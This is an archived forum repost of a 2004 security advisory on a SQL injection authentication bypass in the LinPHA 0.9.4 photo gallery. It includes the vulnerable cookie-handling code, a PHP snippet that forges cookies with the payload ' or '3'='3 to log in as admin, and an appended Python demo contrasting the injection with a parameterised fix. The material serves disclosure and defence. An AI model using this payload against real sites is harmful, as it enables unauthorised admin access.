Full Version: Linpha 0.9.4: Authentication Bypass
GovernmentSecurity.org > The Archives > Exploit Articles
qcred11
Jul 29 2004, 10:22 PM
QUOTE


/////////////////////////////////////////////////////

//// Vulnerable Program: Linpha
////
//// URL: http://linpha.sf.net
////
//// Version: 0.9.4 (latest version)
////
//// Date: July 28, 2004
////
//// Author: Fernando Quintero (a.k.a nonroot)
//// Email: nando_at_udea.edu.co

//////////////////////////////////////////////////////



  I. Affected software description:

  LinPHA is an easy-to-use, multilingual, flexible photo/image
  archive/album/gallery written in PHP.
  It uses a SQL database to store information about your pictures. It
  comes with an HTML-based installer, so you don't need experience in
  setting up a SQL DB.



  II. Bug

  There is a bug in the code that allows a possible attacker to bypass the
  authentication of the linpha admin.
  It can be done without using a password; you only have to modify the
  cookies of the session and then browse to the admin.php script.

  The bug is located approximately at line [25] of the session.php file:

  1. SQL injection allows bypassing the auth


// Read Cookie
24 if(read_config('autologin')) {
25     if(!isset($_SESSION['user_name']) && isset($_COOKIE["linpha_userid"]) && $_COOKIE["linpha_userid"]!="" && isset($_COOKIE["linpha_password"]) && $_COOKIE["linpha_password"]!="")
26     {
27         $query_username = $GLOBALS['db']->Execute("SELECT nickname, level, groups FROM ".PREFIX."users ".
28             "WHERE ID = '".$_COOKIE["linpha_userid"]."' AND ".
29             "password = '".$_COOKIE["linpha_password"]."'");
30
31         if($row = $query_username->FetchRow())
32         {
33             $_SESSION["REMOTE_ADDR"] = @$_SERVER["REMOTE_ADDR"];
34             $_SESSION["user_name"] = $row[0];
35             $_SESSION["user_pass"] = $_COOKIE["linpha_password"];
36             $_SESSION["user_level"] = $row[1];   // Store user level
37             $_SESSION["user_groups"] = $row[2];  // Store user group membership
38         }
39         else // wrong cookie
40         {
41             setcookie("linpha_userid");   // delete cookie linpha_userid
42             setcookie("linpha_password"); // delete cookie linpha_password
43         }
44     }
45 }


  There are two cookies that are validated: linpha_userid and
  linpha_password.

  So I would get in without a password if I inject those cookies.




  I wrote these lines in a test.php:

<?PHP
// user ID of the account to log in as (1 = the admin)
setcookie("linpha_userid","1",time()+86400*365,'/linpha');
// the "password" cookie closes the quoted string and appends a tautology
setcookie("linpha_password","' or '3'='3",time()+86400*365,'/linpha');
?>




  The script is loaded before the admin.php file; then the new cookies will
  inject the query at [29].

  This is possible if the magic_quotes setting is set to Off in the
  php.ini.

  But anyway, these cookies should be checked before using them in the query.



  OK, that's it!




III. Solution

    The main coder was contacted and the code was fixed in the CVS ;).



Source: http://seclists.org/lists/bugtraq/2004/Jul/0335.html
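The bypass described in the advisory, replayed as an added example (Python against an in-memory SQLite table; this is not LinPHA's own code, and nothing here was posted by the advisory author). It rebuilds the autologin query from session.php lines 27-29 with the same string concatenation, runs it with the advisory's cookie value ' or '3'='3, and puts the parameterised form beside it. The table name linpha_users, the row contents and the password strings are constructed for the demo; the only assumption carried over from the advisory is that the admin account has ID 1.

```python
# Added example (not LinPHA code): replays the autologin query from
# session.php lines 27-29 against an in-memory SQLite table to show why the
# cookie value  ' or '3'='3  logs the attacker in as the first user in the
# table, and how a parameterised query stops it. Table contents, the
# "linpha_" prefix and the password strings are constructed for this demo.
import sqlite3
from urllib.parse import quote

PREFIX = "linpha_"                  # assumed table prefix (LinPHA's PREFIX)
INJECTED_PASSWORD = "' or '3'='3"   # the cookie value from the advisory


def setup_db():
    """Constructed users table; ID 1 is the admin, as the advisory assumes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        f'CREATE TABLE {PREFIX}users '
        '(ID INTEGER PRIMARY KEY, nickname TEXT, password TEXT, '
        'level INTEGER, "groups" TEXT)'
    )
    conn.executemany(
        f"INSERT INTO {PREFIX}users VALUES (?, ?, ?, ?, ?)",
        [
            (1, "admin", "adminpass-hash", 4, "admins"),   # constructed row
            (2, "alice", "alicepass-hash", 1, "users"),    # constructed row
        ],
    )
    return conn


def build_vulnerable_query(userid, password):
    """Same string concatenation as session.php: cookie values go straight in.
    With the injected cookie the WHERE clause becomes
        ID = '1' AND password = '' or '3'='3'
    and AND binds tighter than OR, so every row matches."""
    return (
        f'SELECT nickname, level, "groups" FROM {PREFIX}users '
        f"WHERE ID = '{userid}' AND password = '{password}'"
    )


def autologin_vulnerable(conn, userid, password):
    """What the original code does: the first row returned becomes the session."""
    return conn.execute(build_vulnerable_query(userid, password)).fetchone()


def autologin_fixed(conn, userid, password):
    """Hardened form: bound parameters, so quotes in the cookie are plain data."""
    sql = (
        f'SELECT nickname, level, "groups" FROM {PREFIX}users '
        "WHERE ID = ? AND password = ?"
    )
    return conn.execute(sql, (userid, password)).fetchone()


def forged_cookie_header():
    """The Cookie header a browser sends after the advisory's test.php has run.
    PHP URL-decodes cookie values into $_COOKIE, so the quotes arrive intact."""
    return f"linpha_userid=1; linpha_password={quote(INJECTED_PASSWORD, safe='')}"


if __name__ == "__main__":
    db = setup_db()
    print(build_vulnerable_query("1", INJECTED_PASSWORD))
    print("vulnerable:          ", autologin_vulnerable(db, "1", INJECTED_PASSWORD))
    print("fixed, injected:     ", autologin_fixed(db, "1", INJECTED_PASSWORD))
    print("fixed, real password:", autologin_fixed(db, "1", "adminpass-hash"))
    print(forged_cookie_header())
```

Running it shows the concatenated query returning the admin row for the injected cookie while the bound-parameter version returns nothing, which is the check to make when reviewing the CVS fix: the cookie values must never be spliced into the SQL string, regardless of the magic_quotes setting.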

 